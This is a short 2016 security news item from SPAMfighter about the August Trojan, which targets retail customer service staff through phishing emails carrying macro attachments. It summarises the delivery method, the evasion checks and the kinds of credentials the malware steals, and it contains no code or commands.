August Malicious Program Attempts at Filching Credentials

During November this year, Proofpoint the security company detected one sinister Trojan known as August.

As per security researchers of that company, August malicious program aims attack on retail firms' customer service employees by sending them phishing e-mails crafted for appearing as customer complaints alternatively any usual business correspondence. For infecting the users, the malware resorts to PowerShell and Word macros, while the final payload tries filching the victims' information-full documents and user credentials. Securityintelligence.com posted this, December 12, 2016.

Reportedly, a lot of the e-mail headers and baits used relied on references to problems arising from purchases, actually phony, via the retail firm's portal, while were made to aim at persons who possibly could give supportive evidences for those problems. Moreover, the baits as well indicated that a given attachment carried thorough details of the problem.

When installed, August carries out a variety of automated checks so as for sieving sandbox environments as well as bypassing security products. Thereafter, the macro malware searches for the API (application program interface) namely Maxmind IP-to-geolocation; file counts; task names and task counts.

The e-mails looked personalized because their headers mentioned the domain of the recipient. Instances of such headers read "Need help with order on [recipient's domain];" "[recipient's domain] -Help: Items vanish from the cart before checkout;" and "Erroneous charges from [recipient's domain]."

Nonetheless, the attached files indeed carry macros capable of downloading and planting the August malware. When planted, it begins digging out various information items, including pilfering bitcoin wallets, RDP and messenger credentials, FTP credentials, wallet files, as well as passwords and cookies from Outlook, Thunderbird, Chrome and Firefox.

In another report by Symantec titled "The Increased Use of PowerShell in Attacks," there's mention of the wide utilization of one particular tool namely 'task automation accompanied with configuration management,' which serves as attack vector. This method has been so effective that 95.4% of all 111 malware categories assessed within the report utilized PowerShell. Seemingly, this attack vector will continue through the coming times.

As for the techniques which August employs, the malware is hard in spotting whether at the endpoint or the gateway.

» SPAMfighter News - 12/19/2016